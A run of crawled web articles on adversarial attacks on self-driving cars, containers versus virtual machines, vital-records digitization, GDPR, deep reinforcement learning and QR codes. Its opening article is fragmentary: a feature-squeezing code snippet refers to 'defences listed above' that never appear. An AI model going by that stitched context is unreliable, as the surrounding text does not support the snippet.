Fully self-driving automobiles appear to be a long way from reality due to security issues. While roadways are typically tidy and well-known places, what happens on them is anything but predictable. Humans are capable of steering, but they’re also clumsy and erratic at times. So, until all vehicles on the road are fully autonomous, every autonomous vehicle will have to be able to respond to edge cases, as well as the myriad idiosyncrasies and tics that human drivers display on a regular basis.
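Of the defences listed above, feature squeezing is simple enough to sketch: reduce the bit depth of the input and compare the model's prediction on the squeezed input with its prediction on the original – a large disagreement suggests an adversarial example. The helper below is a minimal, illustrative version; the placeholder `predict` function, the threshold, and the example inputs are invented for the sketch and are not taken from the cited paper.

```python
import math

def squeeze_bit_depth(x, bits):
    """Quantize each feature in [0, 1] to 2**bits levels; fine-grained
    adversarial nudges smaller than one quantization step are erased."""
    levels = (1 << bits) - 1
    return [round(v * levels) / levels for v in x]

def is_adversarial(predict, x, bits=3, threshold=0.2):
    """Feature-squeezing detector: flag the input when squeezing it
    moves the model's score by more than `threshold`."""
    return abs(predict(x) - predict(squeeze_bit_depth(x, bits))) > threshold

# Placeholder "model": a steep logistic score on mean intensity,
# standing in for a real sign classifier.
def predict(x):
    mean = sum(x) / len(x)
    return 1.0 / (1.0 + math.exp(-20.0 * (mean - 0.5)))

clean = [3 / 7] * 4                    # sits exactly on the 3-bit grid
adv = [v + 0.06 for v in clean]        # sub-quantization-step nudge

print(is_adversarial(predict, clean))  # False - squeezing changes nothing
print(is_adversarial(predict, adv))    # True - squeezing undoes the nudge
```

The appeal of the approach is that it needs no retraining: the defender only runs the existing model twice, once on the raw input and once on the squeezed one.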
It’s the kind of thing we can swat away while driving without skipping a beat, but getting computers to handle it is a significant matter. It will take a long time to transition from a few autonomous vehicles on the road to 100 percent autonomous vehicles – likely a decade or more even once completely autonomous automobiles that do not require human supervision are developed.

References
- M. Wood, P. Robbel, D. Wittmann et al., “Safety First for Automated Driving,” 2019. [Online].
- C. Szegedy, W. Zaremba, I. Sutskever, J. Bruna, D. Erhan, I. Goodfellow, and R. Fergus, “Intriguing properties of neural networks,” in International Conference on Learning Representations, 2014. [Online].
- F. Tramèr and D. Boneh, “Adversarial training and robustness for multiple perturbations,” arXiv preprint arXiv:1904.13000, 2019.
- I. Goodfellow, “Gradient masking causes CLEVER to overestimate adversarial perturbation size,” arXiv preprint arXiv:1804.07870, 2018.
- C. Finlay and A. M. Oberman, “Scaleable input gradient regularization for adversarial robustness,” arXiv preprint arXiv:1905.11468, 2019.
- N. Carlini and D. Wagner, “Defensive distillation is not robust to adversarial examples,” arXiv preprint arXiv:1607.04311, 2016.
- W. Xu, D. Evans, and Y. Qi, “Feature squeezing: Detecting adversarial examples in deep neural networks,” arXiv preprint arXiv:1704.01155, 2017.
- T. Holstein, G. Dodig-Crnkovic, and P. Pelliccione, “Ethical and social aspects of self-driving cars,” arXiv preprint arXiv:1802.04103, 2018.

Cite this article: Mavneet Kaur (2021), Self-Driving Cars and Adversarial Attacks, Insights2Techinfo, pp. 1.
What Is Containerization?

In the world of computing, containerization is a term that has gained huge attention and popularity in recent years. A container is a lightweight alternative to full machine virtualization, which involves encapsulating an application in an isolated operating environment with all the files and libraries it needs to operate. Every containerized application can share the host system’s user space, while still maintaining its individual system processes, environment variables, and libraries.

Containerization offers a range of benefits, including rapid deployment, portability, and scalability. It allows developers to create predictable environments that are isolated from other applications, reducing the risk of system instability or conflicts between applications. It also enables them to package their software with all of its dependencies, which can then be run on any system running a container engine, regardless of its specific configuration.

Furthermore, containerization supports the microservices architecture, where applications are broken down into small, independent services. This approach allows for faster and more reliable deployment, and more effective management of complex applications.

What Is Virtualization?

Virtualization is a process of creating an abstraction layer over hardware, allowing a single computer to be divided into multiple virtual computers. Each of those virtual computers (known as “guests”) uses part of the hardware resources of the main computer (known as a “host”). The software used to achieve this is a hypervisor. Hypervisors run on a host operating system and enable multiple guest operating systems to run on top of it, sharing the same physical computing resources managed by the host operating system. In essence, this allows the physical computer to abstract the operating system and applications from the hardware.

This is part of a series of articles about Docker containers.

Containerization vs. Virtualization: Key Differences

1. Resource Overhead
When comparing containerization vs virtualization in terms of resource overhead, containerization is the clear winner. Because containers share the host system’s operating system and do not need to run a full operating system, they are significantly more lightweight and consume fewer resources. Virtual machines, on the other hand, each require their own OS, which increases the overhead, especially when many VMs are running on the same host system.

2. Startup Time
In general, containers start up more quickly than VMs because they don’t have to boot an entire operating system. Virtual machines take much longer to boot up. This means containers are more flexible and can be torn down and restarted whenever needed, supporting immutability, which means that a resource never changes after being deployed.

3. Portability
Both containers and virtual machines offer a high degree of portability. However, containers have a slight edge because they package the application and all of its dependencies together into a single unit, which can be run on any system that supports the container platform. Virtual machines, while also portable, are more dependent on the underlying hardware.

4. Security Isolation
In terms of security isolation, virtual machines have the advantage. Because each VM is completely isolated from the host system and other VMs, a security breach in one VM typically does not affect the others (although it is possible to compromise the hypervisor and take control of all VMs on the device). Containers, while isolated from each other, still share the host system’s OS, so a breach in one container could possibly leak to other containers.

5. Scalability and Management
The lightweight nature and rapid startup time offered by containers make them ideal for scaling applications quickly and efficiently. They also lend themselves well to the microservices architecture, which can simplify the management of complex applications.
Virtual machines, while also scalable, are more resource-intensive and take longer to start, making them less suitable for microservices and distributed applications.

Related content: Read our guide to what is a container

Use Cases for Virtualization

Here are some of the main use cases of virtualization technology:

Legacy Applications
In the world of software, legacy applications are often seen as a burden. These are applications that were built using older technologies and are typically difficult to maintain or upgrade. However, they are often critical to business operations and cannot simply be discarded. This is where virtualization shines. Virtualization allows these legacy applications to continue running on their original operating systems, even when the underlying hardware has been upgraded. This means that businesses can continue to use these applications without the need for expensive and time-consuming upgrades. Furthermore, virtualization provides a sandboxed environment, protecting the rest of the system from potential vulnerabilities in these older applications.

Environments Needing Strong Isolation
Virtualization also excels in environments where strong isolation between applications is critical. This is particularly useful in high-security environments, where a breach in one application should not be able to affect others. For instance, in a data center serving multiple organizations, virtualization can be used to isolate applications belonging to different users from each other. Even if one user’s application is compromised, the attacker would not be able to access applications running on other virtual machines.

Infrastructure as a Service (IaaS)
Infrastructure as a Service (IaaS) is a cloud computing model where resources like virtual machines, storage, and networks are provided as a service. Virtualization is a core technology behind IaaS. It allows cloud providers to efficiently utilize their hardware resources by running multiple VMs on the same physical hardware.
Additionally, virtualization provides the flexibility to scale resources according to demand. If a client needs more resources, they can easily be allocated more virtual machines.

Use Cases for Containerization

Here are the main use cases for containerized applications:

Microservices Architectures

One of the main use cases for containerization is in microservices architectures. In a microservices architecture, an application is broken down into small, independent services that communicate with each other. This approach has many benefits, including improved scalability and easier maintenance.

Containers are a perfect fit for microservices. They provide a standardized environment for each service, ensuring that they run consistently across different platforms. Additionally, containers are isolated from each other, which prevents conflicts between services or service instances.

Continuous Integration/Continuous Deployment (CI/CD)

Continuous Integration/Continuous Deployment (CI/CD) is a software development practice where developers integrate their code into a shared repository frequently, usually several times a day. Each integration is then automatically tested and deployed. This approach allows teams to detect and fix problems early, resulting in higher-quality software.

Containerization plays a crucial role in CI/CD. Containers provide a consistent environment for testing, ensuring that tests are reliable and repeatable. Furthermore, containers can be easily deployed to production, making the deployment process faster and more efficient.

Platform as a Service (PaaS)

Platform as a Service (PaaS) is a cloud computing model where a provider delivers a platform for developers to build, test, and deploy applications. This platform typically includes an operating system, middleware, and runtime environment.

Containerization is an integral part of PaaS. It allows providers to efficiently utilize their resources by running multiple containers on the same host.
Additionally, it provides a standardized environment for developers, making it easier for them to build and deploy applications.

The debate between containerization and virtualization is not about which technology is better, but about which is more suitable for a particular use case. Virtualization is a great choice for running legacy applications, providing strong isolation, and in IaaS scenarios. Containerization, on the other hand, is ideal for microservices architectures, CI/CD, and PaaS scenarios.

As we move into the future, it’s clear that both containerization and virtualization will continue to play a role in IT and software development. By understanding their unique use cases and benefits, businesses can make informed decisions about which technology to adopt and how best to leverage it for their needs.
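The kernel-sharing point made earlier has a practical consequence: because a container runs on the host’s kernel rather than its own OS, a process can often guess that it is inside a container by inspecting Linux cgroup metadata. The sketch below is a minimal, hedged illustration; the substrings it checks (`docker`, `kubepods`, `lxc`) are common runtime conventions, not a guaranteed kernel interface, and real detection logic is more involved.

```python
def detect_runtime(cgroup_text: str) -> str:
    """Guess the container runtime from the contents of /proc/1/cgroup.

    Returns "docker", "kubernetes", "lxc", or "none". The marker
    substrings are conventions used by common runtimes, nothing more.
    """
    markers = {
        "docker": "docker",       # Docker Engine
        "kubepods": "kubernetes", # kubelet-managed pods
        "lxc": "lxc",             # LXC containers
    }
    for line in cgroup_text.splitlines():
        for marker, runtime in markers.items():
            if marker in line:
                return runtime
    return "none"


# Hypothetical cgroup contents for illustration.
sample = "12:pids:/docker/3f4a\n11:memory:/docker/3f4a"
print(detect_runtime(sample))             # docker
print(detect_runtime("0::/init.scope"))   # none
```

On a real host you would pass in the contents of `/proc/1/cgroup`; a bare-metal or VM process typically shows plain scopes like `/init.scope`, while a containerized one carries the runtime’s path segments.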
<urn:uuid:53cfd4d5-e891-48e8-a4df-9ae24dabb630>
CC-MAIN-2024-38
https://www.aquasec.com/cloud-native-academy/docker-container/containerization-vs-virtualization/
2024-09-15T09:58:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651622.79/warc/CC-MAIN-20240915084859-20240915114859-00596.warc.gz
en
0.93676
1,607
3.640625
4
Anyone in the records department of a municipality understands that the importance of preserving and accessing vital records cannot be overstated. Birth certificates, marriage licenses, death certificates, and other essential documents are the backbone of government operations and provide invaluable information to individuals and organizations. However, managing these records on paper takes significant time and effort. This is where machine learning steps in to revolutionize the way municipalities handle vital records. In this blog post, we will explore how machine learning technology makes digitizing vital records for cities easy and cost-effective.

The Challenges of Traditional Record-Keeping

Before delving into how machine learning is transforming the landscape, it’s essential to understand the challenges associated with traditional vital record keeping:

- Storing, organizing, and retrieving paper documents is a labor-intensive process prone to errors, misplacement, and loss.
- Paper records can be challenging to access remotely, hindering timely responses to inquiries and requests.
- Physical storage, personnel, and maintenance costs for paper records can strain municipal budgets.
- Protecting sensitive information in paper records can be challenging, making them vulnerable to unauthorized access or theft.
- Inefficient search and retrieval: searching through paper records is time-consuming and often yields incomplete results.

How Machine Learning Addresses These Challenges

Machine learning technologies, such as natural language processing (NLP), computer vision, and data extraction algorithms, are invaluable in overcoming the limitations of traditional record-keeping systems. Here’s how:

- Machine learning algorithms can analyze and extract data from paper records swiftly and accurately. This reduces the need for manual data entry, minimizing errors and saving time.
- Digital records can be accessed remotely, enabling municipalities to respond to requests more efficiently.
This accessibility also facilitates disaster recovery and backup processes.

- Once records are digitized, the ongoing physical storage and maintenance costs are significantly reduced. Additionally, machine learning tools become more cost-effective as technology advances.
- Digital records can be encrypted, protected with access controls, and backed up securely, reducing the risk of data breaches and ensuring compliance with privacy regulations.
- Machine learning-powered search algorithms can quickly locate specific records, even if they contain handwritten text. This boosts efficiency and accuracy in record retrieval.

Machine learning’s impact on digitizing vital records is not theoretical; it is already used across many municipalities. Indeed, iTech uses it to extract data and make it searchable and accessible for citizens of multiple cities.

Historical Records

Old, fragile records can be digitized without compromising their integrity, ensuring that valuable historical data is preserved for future generations.

Integration with Other Systems

Machine learning can facilitate the integration of vital records with other government systems, streamlining administrative processes.

By automating data extraction, enhancing accessibility, and improving data security, iTech, using machine learning, is helping governments streamline their operations, better serve their citizens, and preserve important historical records.

At iTech, we help cities, towns, and other municipalities make the most of their data with the right technology for each municipality’s unique needs. This may entail OCR with machine learning technology, cloud data storage solutions, and beyond. Our team has the experience and technology to help you meet your vital records retrieval challenges. We invite you to contact us today to discuss your municipality’s vital records storage situation.
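The efficient search and retrieval benefit described above can be made concrete with a toy inverted index over digitized record text. This is a hedged sketch, not iTech’s actual pipeline; the record IDs and texts are invented for illustration, and a production system would layer OCR and ML-based ranking on top of an index like this.

```python
from collections import defaultdict


def build_index(records: dict[str, str]) -> dict[str, set[str]]:
    """Map each lowercase word to the set of record IDs containing it."""
    index: defaultdict[str, set[str]] = defaultdict(set)
    for record_id, text in records.items():
        for word in text.lower().split():
            index[word].add(record_id)
    return dict(index)


def search(index: dict[str, set[str]], query: str) -> set[str]:
    """Return the IDs of records containing every word in the query."""
    words = query.lower().split()
    if not words:
        return set()
    results = index.get(words[0], set()).copy()
    for word in words[1:]:
        results &= index.get(word, set())
    return results


# Hypothetical digitized records.
records = {
    "B-1901-042": "birth certificate Jane Doe 1901",
    "M-1925-310": "marriage license Jane Doe John Smith 1925",
}
index = build_index(records)
print(search(index, "jane doe"))  # both record IDs match
```

A lookup like `search(index, "marriage jane")` narrows instantly to the matching record, which is exactly the kind of retrieval that is slow and error-prone with paper files.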
<urn:uuid:a6cfbbea-47ab-470a-849c-7817b3fdc832>
CC-MAIN-2024-38
https://itechdata.ai/machine-learning-makes-digitizing-vital-records-for-municipalities-easy-and-cost-effective/
2024-09-19T04:53:04Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651981.99/warc/CC-MAIN-20240919025412-20240919055412-00296.warc.gz
en
0.911498
677
2.984375
3
What is GDPR?

The General Data Protection Regulation, or GDPR, is a regulation that requires businesses to protect data and privacy in the European Union (EU) and the European Economic Area (EEA). The GDPR protects European citizens and residents from data misuse and abuse as well as careless data practices. It is the answer to the call for companies to be more transparent and accountable in their data practices. It covers every aspect of working with information, from data capture to data erasure.

The GDPR concerns itself with accountability, transparency, and fairness. At the heart of the law is data minimization. In other words, you shouldn’t be collecting, using, or storing data that you don’t have a use for. And you definitely shouldn’t do those things if you don’t have consent from the data subject.

Why GDPR was introduced

In today’s digital world, a frightening amount of personal information (banking information, contact lists, our IP addresses, documents, and social media feeds) is available online. Have we, as consumers, ever wondered how this data is collected, stored, and used? This is why in May 2018, a European privacy regulation called GDPR became mandatory for all businesses dealing with European citizens’ data. As an automated data entry services provider and a GDPR-compliant firm, iTech briefly explains all you need to know about GDPR.

Are all companies GDPR compliant yet?

Dell and Dimension Research came out with surprising facts from their survey of 800 professionals responsible for data protection. It found that 80 percent of those surveyed have little or no idea of what is involved in the GDPR. Months after it became mandatory, 1 in 4 companies still had work to do to become GDPR compliant. And it is not just smaller businesses; even many tech companies are trailing in this. It is time for a fast catch-up if you don’t want to pay hefty fines.
Many companies beyond Europe, particularly in America and Asia, are setting up compliance programs. Whatever your industry and wherever your location, here is a summary of what GDPR is, how it can impact your business, and tips on getting compliant.

Does GDPR Apply to You?

The GDPR applies to you if you collect data from EU citizens or residents, whom the law protects. Even if you are not based in the EU and do not pay taxes in an EU member state, you must still comply with the GDPR as long as you presently collect or continue to store data from EU data subjects. If you don’t wish to go through the compliance process, then you’ll need to block access to your site in the EU to avoid inadvertently collecting EU data.

Whether or not you need to comply, consider doing so anyway. Many of the GDPR principles are good business practice, and today’s internet users expect and demand a greater degree of privacy whether or not it’s the law.

Why must businesses get GDPR compliant?

Companies will have to review all their business processes and overhaul their sign-up forms. For example, if you send a newsletter, you will have to prove that the customer explicitly opted in to it. A blanket acceptance will no longer hold good for all user engagement. Also, businesses cannot deny customer service, such as making a website inaccessible, because a user did not accept the capture of their personal details.

What are the 8 GDPR Rights of Individuals?

- The right to request access to personal data and know how a business is using it.
- The right to be forgotten: the right to withdraw consent and have their information deleted at any time. The responsibility is solely on the business to remove the data from all parties in the custody chain.
- The right to transfer, which allows individuals to have their data transferred from one provider to another.
- The right to be informed, whereby the user knows before any data is collected.
- The right to know when the data is collected, with full authority for the user to update the information at any time.
- Individuals also have the right to restrict their data from being shared.
- They have the right to stop the data from being used for any direct marketing activity.
- And most important of all: in the event of a data breach, the company must notify the relevant supervisory authority within 72 hours of becoming aware of it, and affected users without undue delay. This makes it vital for businesses to implement security checks at every level and a notification system as well.

GDPR and Data Capture

On May 25, 2018, the new General Data Protection Regulation, or GDPR, came into effect. GDPR applies to all businesses that sell to citizens in Europe. It also covers all technical processing companies that process the information on the seller’s behalf.

What GDPR means is that customers have more control over their personal data. This data relates to anything about a person: name, photo, email address, bank details, location details, medical information, or computer IP address. This will have a far-reaching impact on businesses when it comes to customer engagement.

The old opt-out process of implicit consent no longer applies; we have already seen this with Facebook. The social media giant has had to switch to an opt-in consent process. In the law’s eyes, inaction on the user’s part cannot imply that they consent to their data capture.

The most tangible impact of the GDPR for businesses tends to be in how their consent mechanisms change. You can’t capture data without a legal basis. One of those legal bases is consent. However, consent isn’t implied – you have to prove it.
Article 7 of the GDPR covers the “conditions for consent.” Essentially, you need to be able to:

- Prove the data subject consented
- Demonstrate the consent request was written, easily accessible, and presented in clear and plain language
- Offer the right for the subject to withdraw their consent whenever they want
- Make it easy to withdraw consent
- Ensure consent isn’t a condition for accessing your business

In other words, the customer needs to know they are consenting to data processing, and you can’t ban them from your site if they don’t consent to the processing. Getting consent once isn’t enough: if you change the way you process the data, you need to seek consent for that. One consent doesn’t cover all conditions. If any of your data processing activities change, you need to update your data subjects and likely ask for consent again.

Meeting the Conditions

What do those consent conditions look like in practice? It means requesting a “clear, affirmative act establishing a freely given, specific, informed and unambiguous indication of the data subject’s agreement to the processing.”

When you seek affirmative consent (such as ticking a box), you’ll need to share details like:

- How you process the data
- Why you process the data
- How to revoke consent
- Whether you share the data with third parties
- Whether the data leaves the EU
- How long you store data

Additionally, all the information you provide needs to be written in clear language that anyone can read. That means writing to the reading level of your average user, choosing a readable font, and organizing your privacy statement well. Trying to mask your data practices in legalese or “fine print” can earn you a stern call from your local data protection office. Taken too far, you’ll be named, shamed, and fined.
Data Capture in the Age of the Right to Be Forgotten

The ability to freely and easily withdraw consent is an important part of data capture and data entry. (If you aren’t sure about the difference between data capture and data entry, check this article.) The EU says that it should be as easy for data subjects to revoke their consent as it is to provide it.

As well as showing data subjects how to withdraw consent for processing, companies must now abide by the “right to be forgotten” principle. The right to be forgotten is one of the data subjects’ rights. Outlined in Article 17, it says that data subjects may request the erasure of their data in specific circumstances. They may request to be ‘forgotten’ when:

- You no longer need their personal data for the original collection purpose
- They withdraw the consent to the processing and you must comply
- You processed their data unlawfully
- You must erase it to comply with a law

In these cases, you have an obligation to delete their data “without undue delay.”

GDPR Compliance Isn’t Optional

As of May 25, 2018, you must either comply with the GDPR or block access to your site. Companies that continue to ignore the new rules or provide woefully inadequate solutions face serious fines. The EU could come for two to four percent of your total global turnover. Google recently paid a $57 million fine after the French data protection regulator ruled that Google didn’t work hard enough to get consent from users.

Part of upholding the GDPR means working with GDPR-compliant solutions providers. Get in touch today to learn how we can keep your data capture compliant.

Penalties for GDPR violations

The General Data Protection Regulation (GDPR) intends to build trust between consumers and businesses handling their personal data. Any violation can attract hefty penalties for data controllers as well as data processors. For severe breaches, fines can go up to 20 million euros or 4 percent of global turnover, whichever is higher.
The amount of the penalty varies based on factors such as the steps taken to be GDPR compliant, the severity of the data breach, and the mechanisms in place to prevent a breach. Recognizing the importance of GDPR, iTech takes all the required steps to be compliant in all our services: data entry outsourcing services, freight audit services, medical insurance verification, and more. Contact us for secure data services!
<urn:uuid:91aea6b2-14f2-4f72-a7fb-6cf9ee84a09e>
CC-MAIN-2024-38
https://itechdata.ai/what-is-gdpr-and-how-does-it-impact-data-capture/
2024-09-19T03:13:09Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651981.99/warc/CC-MAIN-20240919025412-20240919055412-00296.warc.gz
en
0.944978
2,082
2.8125
3
Combining reinforcement learning and deep learning gives us the term deep reinforcement learning (deep RL). Deep reinforcement learning is a subfield of machine learning (ML) and artificial intelligence (AI) in which intelligent machines learn from their actions, much the way humans learn from past experiences. Deep RL algorithms work on a trial-and-error basis.

Reinforcement learning is distinct from the two other main forms of machine learning: supervised learning, where a machine learns to predict the label for complex inputs, and unsupervised learning, where a system groups related items to improve outcomes. Reinforcement learning can help achieve the best possible results because it learns which actions to take from feedback rather than from labeled examples.

How deep reinforcement learning works

A continuous stream of data is fed into the machine. Unlike ordinary ML-enabled systems, this type of learning is reinforced: the reinforcement learning (RL) process involves training software agents to learn ideal behavior within a particular environment in order to achieve optimized results. During reinforcement learning, an agent is rewarded for any positive behavior (to encourage such actions) and punished for any negative behavior (to discourage such actions). Ultimately, the agent learns the desired behavior that maximizes the total reward. This pattern makes deep reinforcement learning especially applicable in dynamic environments.

The concept of reinforcement learning existed even before modern AI came into force. Its combination with deep learning paved the way for tech experts to achieve excellent results. In the term deep reinforcement learning, the word “deep” refers to the several layers of an artificial neural network, loosely replicating the human brain’s structure. It is a fast-moving field applied in various spheres to accelerate processes and maximize outputs.

How deep reinforcement learning benefits businesses
Let’s learn how deep reinforcement learning can prove helpful for businesses in different fields.

Robots in factories

Consider the task of boxing a product and placing it into a larger container. Robots can perform this task with great speed and accuracy by training themselves. Here, robots use deep reinforcement learning, where they are trained to learn and perform a new task. While performing a particular task, a robot captures video footage of the process. Whether the task succeeds or fails, it memorizes the action, and the knowledge it acquires becomes part of the deep learning model controlling the robot’s actions. A Japanese company named Fanuc created an industrial robot that is intelligent enough to train itself to perform a particular task.

Optimization of space management in warehouses

Warehouse managers often face challenges in finding the best ways to optimize space utilization. Abundant inventory, fluctuating demand for stock, and slow merchandise replenishment rates are factors that a manager needs to take care of before accumulating items in a warehouse. Reinforcement learning algorithms help reduce transit time for stocking and retrieving products in the warehouse, while also optimizing space utilization and warehouse operations.

Dynamic pricing

Adjusting prices depending on supply and demand helps maximize revenue from products. Q-learning techniques can be used to solve the dynamic pricing problem: reinforcement learning algorithms help businesses optimize pricing during interactions with customers.

Delivery management

A manufacturer who wants to deliver products to customers using a fleet of trucks must meet customer demand. The manufacturer can use the Split Delivery Vehicle Routing Problem (SDVRP) formulation to make split deliveries and realize savings in the process. The manufacturer’s prime objective is to reduce total fleet cost while meeting all customer demands.
Introducing a multi-agent system helps agents communicate and cooperate with one another through reinforcement learning. Using Q-learning to serve each customer with just one vehicle proves helpful for the manufacturer, who reaps benefits by improving execution time and reducing the number of trucks needed to meet customer demand.

Personalized shopping experiences

Personalization is the need of the hour, especially when it comes to the shopping experience. Retailers and e-commerce merchants study customer purchasing habits and increasingly see it as imperative to tailor communications and promotions through personalization. Personalization helps retailers promote relevant shopping experiences that capture customer attention. Using reinforcement learning algorithms, e-commerce merchants can learn and analyze customer behavior and tailor products and services to suit customer interests.

In the medical industry

In medical research, a dynamic treatment regime (DTR) is a set of rules for finding effective treatments for patients. An illness like cancer demands treatment over a long period, where drugs and treatment levels need to be administered over time. Reinforcement learning helps address the DTR problem: RL algorithms can process clinical data to develop a treatment strategy, using various clinical indicators collected from patients as inputs.

Humans keep searching for ways to make machines perform human tasks, and emerging technologies have made much of this possible. Even though there is still a significant gap between the idea and the reality, reinforcement learning has raised hopes by enabling robots and machines to perform tasks that were once impossible. This is just the beginning: reinforcement learning plays a major part as an innovative technology that can drive business value.
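The tabular Q-learning mentioned in the pricing and routing examples can be sketched in a few lines. This is a hedged toy illustration on a two-state problem with invented rewards, not a production pricing system; deep reinforcement learning replaces the small table below with a neural network when the state space grows too large to enumerate.

```python
import random

random.seed(0)  # deterministic for reproducibility

# Toy problem: in each state, the agent picks a price level (an action).
# The reward table is invented purely for illustration.
n_states, n_actions = 2, 3
rewards = [[1.0, 3.0, 2.0],   # state 0: action 1 pays best
           [2.0, 0.0, 4.0]]   # state 1: action 2 pays best

alpha, gamma, epsilon = 0.1, 0.9, 0.1
Q = [[0.0] * n_actions for _ in range(n_states)]

state = 0
for _ in range(5000):
    # Epsilon-greedy: mostly exploit the best known action, sometimes explore.
    if random.random() < epsilon:
        action = random.randrange(n_actions)
    else:
        action = max(range(n_actions), key=lambda a: Q[state][a])
    reward = rewards[state][action]
    next_state = random.randrange(n_states)
    # The Q-learning update rule: nudge Q(s, a) toward reward + discounted
    # value of the best action available in the next state.
    best_next = max(Q[next_state])
    Q[state][action] += alpha * (reward + gamma * best_next - Q[state][action])
    state = next_state

best = max(range(n_actions), key=lambda a: Q[0][a])
print(best)  # learned best action in state 0 (action 1 for this table)
```

The agent is never told which price level is best; it discovers it from reward feedback alone, which is exactly the trial-and-error loop described earlier.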
To learn more about artificial intelligence and reinforcement learning, visit our latest whitepapers on artificial intelligence technology.
<urn:uuid:f5c58da0-364b-40df-aa8e-fd2d4f1d5152>
CC-MAIN-2024-38
https://www.ai-demand.com/insights/tech/artificial-intelligence/deep-reinforcement-learning-a-new-form-of-learning/
2024-09-13T01:30:19Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00896.warc.gz
en
0.92866
1,060
4.15625
4
QR Code – Quick Response Code.

A QR code is a type of barcode that can be read by a digital device and which stores information as a series of pixels in a square-shaped grid. Standard barcodes can only be read in one direction – top to bottom – and store a small amount of information, usually in an alphanumeric format. A QR code is read in two directions – top to bottom and right to left – and can store significantly more data.

A QR reader can identify a standard QR code based on the three large squares at the corners of the QR code. Once it has identified these three shapes, it knows that everything contained inside the square is a QR code. The QR reader then analyzes the QR code by breaking the whole thing down into a grid. It looks at the individual grid squares and assigns each one a value based on whether it is black or white. It then groups grid squares to create larger patterns.

A standard QR code is identifiable based on six components:

- Quiet Zone – This is the empty white border around the outside of a QR code. Without this border, a QR reader will not be able to determine what is and is not contained within the QR code (due to interference from outside elements).
- Finder pattern – QR codes usually contain three black squares in the bottom left, top left, and top right corners. These squares tell a QR reader that it is looking at a QR code and where the outside boundaries of the code lie.
- Alignment pattern – This is another, smaller square contained somewhere near the bottom right corner. It ensures that the QR code can be read even if it is skewed or at an angle.
- Timing pattern – This is an L-shaped line that runs between the three squares in the finder pattern. The timing pattern helps the reader identify individual squares within the whole code and makes it possible for a damaged QR code to be read.
- Version information – This is a small field of information contained near the top-right finder pattern cell.
This identifies which version of the QR code is being read (see “Types of QR code” below).

- Data cells – The rest of the QR code communicates the actual information, i.e., the URL, phone number, or message it contains.

Types of QR code

There are four widely accepted versions of QR codes. The version used determines how data can be stored and is called the “input mode.” It can be numeric, alphanumeric, binary, or kanji. The type of mode is communicated via the version information field in the QR code.

- Numeric mode – This is for decimal digits 0 through 9. Numeric mode is the most effective storage mode, with up to 7,089 characters available.
- Alphanumeric mode – This is for decimal digits 0 through 9, plus uppercase letters A through Z, and the symbols $, %, *, +, -, ., /, and :, as well as a space. It allows up to 4,296 characters to be stored.
- Byte mode – This is for characters from the ISO-8859-1 character set. It allows 2,953 characters to be stored.
- Kanji mode – This is for double-byte characters from the Shift JIS character set, used to encode characters in Japanese. This was the original mode, first developed by Denso Wave, but it has since become the least effective, with only 1,817 characters available for storage. A second kanji mode, called Extended Channel Interpretation (ECI) mode, can specify the kanji character set UTF-8. However, some newer QR code readers will not be able to read this character set.

There are two additional modes which are modifications of the other types:

- Structured Append mode – This encodes data across multiple QR codes, allowing up to 16 QR codes to be read simultaneously.
- FNC1 mode – This allows a QR code to function as a GS1 barcode.

[Thanks to Kaspersky for this information.]
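The choice between the input modes above can be automated: an encoder picks the densest mode that covers every character in the payload, since numeric mode stores more characters than alphanumeric, which in turn stores more than byte mode. Below is a hedged sketch of that selection logic; it mirrors the character sets described above but is not a full QR encoder (kanji mode is omitted for brevity).

```python
NUMERIC = set("0123456789")
# The 45-character alphanumeric set: digits, A-Z, space, and $ % * + - . / :
ALPHANUMERIC = NUMERIC | set("ABCDEFGHIJKLMNOPQRSTUVWXYZ $%*+-./:")


def pick_mode(data: str) -> str:
    """Pick the densest QR input mode that can represent `data`.

    The capacity comments quote the maxima given above (largest
    symbol version, lowest error correction).
    """
    chars = set(data)
    if chars <= NUMERIC:
        return "numeric"        # up to 7,089 characters
    if chars <= ALPHANUMERIC:
        return "alphanumeric"   # up to 4,296 characters
    try:
        data.encode("iso-8859-1")
        return "byte"           # up to 2,953 characters
    except UnicodeEncodeError:
        # Outside ISO-8859-1: fall back to Extended Channel Interpretation.
        return "eci"


print(pick_mode("1234567890"))           # numeric
print(pick_mode("HELLO WORLD"))          # alphanumeric
print(pick_mode("https://example.com"))  # byte (lowercase is not alphanumeric)
```

Note the last case: URLs with lowercase letters cannot use alphanumeric mode, which is why uppercase-only URLs produce smaller QR codes.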
<urn:uuid:d1929659-19c5-4063-b5a7-243cdb599124>
CC-MAIN-2024-38
https://blocksandfiles.com/2022/11/23/qr-code/
2024-09-15T12:58:23Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651630.14/warc/CC-MAIN-20240915120545-20240915150545-00696.warc.gz
en
0.906955
836
4.03125
4
The European Union’s General Data Protection Regulation (GDPR) is a regulation designed to protect an individual’s personal data. In addition to giving citizens control of their personal data, the GDPR also aims to unify data protection laws across the European Union (EU).

The GDPR entered into force on 24 May 2016, and enforcement began on 25 May 2018. The regulation applies to any organisation processing the data of an EU citizen, even if the organisation is based outside the EU. Organisations worldwide therefore have to ensure that their data processing activities comply with the requirements of the GDPR.

A note for UK-based individuals and organisations: although the UK has left the EU, the UK Government has incorporated the provisions of the GDPR into domestic legislation as the UK GDPR. This means that the rules in this guide continue to apply equally in the UK.

When it was introduced, the regulation was the toughest data protection law in the world. Non-compliant organisations face fines of up to 4% of annual revenue or €20 million, whichever is greater. These penalties can seriously harm organisations of any size, highlighting the importance of undertaking the reforms required to comply with the regulation.

Companies or organisational departments specialising in data management need to pay particular attention to the requirements of the GDPR, since there are likely to be multiple internal and external stakeholders involved in data collection, management and transmission. In particular, each stakeholder’s role – and hence their responsibilities – must be defined. For instance, in our data integration work, we are classified as a “Data Processor”. The head office client on whose behalf we collect data (e.g. a car manufacturer) is a “Data Controller”, and the third parties whose data we collect (e.g. a car dealership) are “Data Providers”. Each needs to comply – and demonstrate that compliance – with the principles of the GDPR.
